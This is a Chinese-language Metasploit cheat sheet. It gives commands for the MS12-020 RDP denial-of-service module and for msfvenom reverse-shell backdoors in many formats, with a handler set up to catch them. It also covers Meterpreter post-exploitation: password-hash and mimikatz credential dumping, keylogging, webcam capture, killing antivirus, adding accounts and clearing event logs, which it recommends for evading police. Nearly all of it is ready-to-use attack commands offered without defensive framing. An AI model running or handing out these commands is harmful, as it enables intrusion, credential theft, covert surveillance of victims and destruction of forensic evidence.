通俗使用方法
搜索需要的模块
msf > search ms12-020进入模块
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids)查看需要填写的参数,这里需要填写靶机
msf auxiliary(ms12_020_maxchannelids) > show options设置参数
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.116.129
RHOST => 192.168.116.129最后输入命令“run”,执行我们的auxiliary攻击模块:
msf auxiliary(ms12_020_maxchannelids) > run
meterpreter使用方法
使用msfvenom生成后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=175.xxx.xxx.xxx lport=8081 -f hta-psh -o test.hta后门在被攻击机上执行
各种方法让后门在被攻击机上面运行使用handler模块进行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 8081
exploit等待被攻击机连接即可
meterpreter常用命令
Help:这个参数可以查看meterpreter的全部参数和英文解释
Background:这个命令可以让当前的会话在后台运行。从而进行新的渗透测试。如果想返回之前的会话,那么就输入sessions -i 命令。
Cat:这个命令可以查看目标系统的文件。这个命令和unix里面的cat命令有一样的效果。
Clearev:这个命令很重要!如果你不想被查水表,当你对目标系统测试后,一定要输入clearev命令。这个命令可以清除系统,软件之类的所有登陆信息。目前我还没发现能够恢复这些登陆信息方法,所以这个指令很有用。
Download:就是下载命令。输入这个命令可以下载目标系统的文件。
Ls:这个命令就是列出当前所在路径下的文件目录。和linux的ls命令一样。
Edit:这个是编辑命令。运用的是vim编辑器。
Execute:这个是执行命令。可以先输入execute,然后回车查看这个命令更详细的信息。
Getuid:这个命令可以查看meterpreter所在的用户组,或者说是你目前所拥有的权限。
Hashdump:这个属于一个post模块,要配合meterpreter使用。这个模块可以获取目标系统的哈希值。
Idletime:输入这个指令可以查看目标系统运行了多长时间。
Ipconfig:这个都不知道就不用往下看了。。。。。。
Pwd:输出当前所在路径
Cd:这个命令就是转到某个目录。和linux里面的cd命令一样。
Lpwd:显示本地目录。也就是你自己所在的自己系统的位置。
Lcd:进入本地目录。也就是进入你自己系统的目录。
Migrate:这个是一个POST模块。可以将meterpreter当前的进程移动到一个新的进程。主要用来防软杀,或者进程不稳定的时候使用这个模块。使用“run post/windows/manage/migrate”这个命令即可。
Ps:这个命令可以查看目标系统的所有进程。这个命令很有用。如果你没有root权限或者administrator权限,你可以先查看进程,随后根据进程分析目标系统运行了什么软件。随后可以查找哪些软件有命令执行漏洞用来提权。甚至你还可以查看到目标系统用什么数据库之类的等等。
Search:这个命令可以帮助我们搜索目标系统的一些文件。我一般都用来查找备份的数据库文件。
Shell:这个命令可以在目标系统打开一个命令行窗口。
Upload:这个命令可以上传一些文件。
keyscan_start # 开启键盘记录
keyscan_dump #查看键盘记录内容
keyscan_stop #关闭键盘记录run getgui -e 启用远程桌面
run getgui -u XXX -p XXX 添加用户
screenshot 截屏
webcam_list:这个命令可以查看目标机器上是否有网络摄像头,并且列举出来。
webcam_snap:这个命令主要是远程连接目标系统的摄像头。大家可以使用webcam_snap –h查看更详细的参数。
Run killav:这个命令可以关闭对方的软杀
meterpreter下使用mimikatz
- 提升权限
- >getsystem
- 获取windows密码
- >load mimikatz
- >msv(查看hash)
- >kerberos(查看明文密码)
- 其他用法
- >help mimikatz
附上常用后门生成命令
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php